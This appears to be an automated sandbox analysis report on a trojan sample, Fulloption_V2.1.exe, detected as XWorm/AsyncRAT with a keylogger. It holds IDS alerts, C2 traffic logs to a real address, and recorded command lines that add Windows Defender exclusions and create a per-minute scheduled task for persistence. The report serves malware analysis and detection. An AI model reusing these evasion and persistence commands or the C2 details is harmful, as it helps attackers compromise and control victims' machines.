                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3f7fe40x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3fa0000x3beac.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4360000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x3f60440x3f6200935e2aa74ff27ebcd43bab69a763bf17unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x3fa0000x3beac0x3c000f446811a2582163097c3fa2a19689a39False0.23304036458333333data4.4905023746631985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x4360000xc0x200594615387619187b33b96dd2e7366c0fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x3fa1300x3b908Device independent bitmap graphic, 256 x 462 x 32, image size 2365440.23174410597763714
                                                                                RT_GROUP_ICON0x435a380x14data1.1
                                                                                RT_VERSION0x435a4c0x274data0.4538216560509554
                                                                                RT_MANIFEST0x435cc00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-20T10:38:26.386907+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:38:26.607517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64998645.141.27.2487777TCP
                                                                                2024-11-20T10:38:30.152640+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:38:30.152640+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:38:38.929759+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:38:38.931580+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64998645.141.27.2487777TCP
                                                                                2024-11-20T10:38:51.230589+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:38:51.232720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64998645.141.27.2487777TCP
                                                                                2024-11-20T10:39:00.150444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:39:00.150444+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:39:03.593725+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:39:03.595756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64998645.141.27.2487777TCP
                                                                                2024-11-20T10:39:14.007694+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.649986TCP
                                                                                2024-11-20T10:39:14.008600+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64998645.141.27.2487777TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 20, 2024 10:37:11.484632015 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:37:11.489640951 CET8049711208.95.112.1192.168.2.6
                                                                                Nov 20, 2024 10:37:11.489721060 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:37:11.490232944 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:37:11.495208979 CET8049711208.95.112.1192.168.2.6
                                                                                Nov 20, 2024 10:37:11.957405090 CET8049711208.95.112.1192.168.2.6
                                                                                Nov 20, 2024 10:37:12.005644083 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:38:13.517193079 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:13.522862911 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:13.522947073 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:13.566546917 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:13.571517944 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:21.447602987 CET8049711208.95.112.1192.168.2.6
                                                                                Nov 20, 2024 10:38:21.447788954 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:38:25.946774006 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:25.953778028 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:26.386907101 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:26.427795887 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:26.607517004 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:26.612369061 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:30.152640104 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:30.193418026 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:38.334481001 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:38.340311050 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:38.929759026 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:38.931580067 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:38.941502094 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:50.725512028 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:50.731092930 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:51.230588913 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:51.232719898 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:38:51.240078926 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:38:51.976311922 CET4971180192.168.2.6208.95.112.1
                                                                                Nov 20, 2024 10:38:51.981411934 CET8049711208.95.112.1192.168.2.6
                                                                                Nov 20, 2024 10:39:00.150444031 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:00.193516970 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:39:03.115813017 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:39:03.121007919 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:03.593724966 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:03.595756054 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:39:03.601629019 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:13.522186995 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:39:13.528578997 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:14.007694006 CET77774998645.141.27.248192.168.2.6
                                                                                Nov 20, 2024 10:39:14.008599997 CET499867777192.168.2.645.141.27.248
                                                                                Nov 20, 2024 10:39:14.017343998 CET77774998645.141.27.248192.168.2.6
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 20, 2024 10:37:11.470412970 CET6413753192.168.2.61.1.1.1
                                                                                Nov 20, 2024 10:37:11.479039907 CET53641371.1.1.1192.168.2.6
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 20, 2024 10:37:11.470412970 CET192.168.2.61.1.1.10xaaa1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 20, 2024 10:37:11.479039907 CET1.1.1.1192.168.2.60xaaa1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                • ip-api.com
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.649711208.95.112.1804000C:\Users\user\AppData\Roaming\svchost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 20, 2024 10:37:11.490232944 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                Host: ip-api.com
                                                                                Connection: Keep-Alive
                                                                                Nov 20, 2024 10:37:11.957405090 CET175INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Nov 2024 09:37:11 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 6
                                                                                Access-Control-Allow-Origin: *
                                                                                X-Ttl: 56
                                                                                X-Rl: 43
                                                                                Data Raw: 66 61 6c 73 65 0a
                                                                                Data Ascii: false


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:04:37:05
                                                                                Start date:20/11/2024
                                                                                Path:C:\Users\user\Desktop\Fulloption_V2.1.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Fulloption_V2.1.exe"
                                                                                Imagebase:0xb40000
                                                                                File size:4'400'640 bytes
                                                                                MD5 hash:9F53CC8BC6CB459CB3C5CCC0D54812D6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:04:37:06
                                                                                Start date:20/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                Imagebase:0x7ff6ae6d0000
                                                                                File size:4'065'792 bytes
                                                                                MD5 hash:2F6E9C0DD1C6859A9D6E7ACEA1DB9AC0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.2149098147.00007FF6AE88B000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 68%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:3
                                                                                Start time:04:37:06
                                                                                Start date:20/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                Imagebase:0xe70000
                                                                                File size:75'264 bytes
                                                                                MD5 hash:12B722899C9A6B517D52B8DE2C7C3E2E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 84%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:04:37:10
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:04:37:10
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:04:37:17
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:04:37:17
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:04:37:28
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:04:37:28
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:04:37:45
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:16
                                                                                Start time:04:37:45
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:04:38:07
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                                                                                Imagebase:0x7ff61a980000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:04:38:07
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:04:38:08
                                                                                Start date:20/11/2024
                                                                                Path:C:\ProgramData\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\ProgramData\svchost.exe
                                                                                Imagebase:0xd60000
                                                                                File size:75'264 bytes
                                                                                MD5 hash:12B722899C9A6B517D52B8DE2C7C3E2E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 84%, ReversingLabs
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:04:39:01
                                                                                Start date:20/11/2024
                                                                                Path:C:\ProgramData\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\ProgramData\svchost.exe
                                                                                Imagebase:0x9a0000
                                                                                File size:75'264 bytes
                                                                                MD5 hash:12B722899C9A6B517D52B8DE2C7C3E2E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Reset < >
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c6a4fa86990f83efa31fa2e8cc26ac368fa79a08d6a79e7b99c7b1cea8c24bc9
                                                                                  • Instruction ID: 2cfac3219cb0a1bfcb75074b17e8ed23cf2b80a622f9d9b63dd2dff0b78483f8
                                                                                  • Opcode Fuzzy Hash: c6a4fa86990f83efa31fa2e8cc26ac368fa79a08d6a79e7b99c7b1cea8c24bc9
                                                                                  • Instruction Fuzzy Hash: 1631BB21B0DAC94FEB95E76C48A92B97BE1EF9A205B0400BBE44DC32D3DD58AC45C751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5f6c208cd106f17ba6eba01a8544563209692bc9fd97772ea0b53290fb88d7c2
                                                                                  • Instruction ID: dd8bcc775b8cb91e1711bbfe6ff3053b1921b851410dc5ead21fb4a4e5baec0e
                                                                                  • Opcode Fuzzy Hash: 5f6c208cd106f17ba6eba01a8544563209692bc9fd97772ea0b53290fb88d7c2
                                                                                  • Instruction Fuzzy Hash: E8715F30A1A9098FEB98EF68C4A8BAD77E2FF55314F504169E11AD32D1CF78AC45DB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 55f92e4d55caa7e93b38c68323c63af260f180be33a0c5feacc819bfacebb21a
                                                                                  • Instruction ID: cf20f4b9922855ff0c8d44ab04c21f7cb890f4ec5aff029d1216e62ee7711204
                                                                                  • Opcode Fuzzy Hash: 55f92e4d55caa7e93b38c68323c63af260f180be33a0c5feacc819bfacebb21a
                                                                                  • Instruction Fuzzy Hash: 8731676284E3C25FC7439B704CBA4A17FB09E4722070E41DBD4C5CB5A3D55C6A9AD762
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45b2893c027cc86e9aa229ada5a8ed0e6b30301730c88573102277ee7b06d7ee
                                                                                  • Instruction ID: 7e3d65aa0b3e685ff0a85afcf2aa26e08e12dcf028208fc3d819deec81db3c0f
                                                                                  • Opcode Fuzzy Hash: 45b2893c027cc86e9aa229ada5a8ed0e6b30301730c88573102277ee7b06d7ee
                                                                                  • Instruction Fuzzy Hash: 9A21B331B0994D8FEBD4FB6C88AD6BD77D2EF99305B04047AE40ED3693DD68A8418750
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2152801922.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd348a0000_Fulloption_V2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
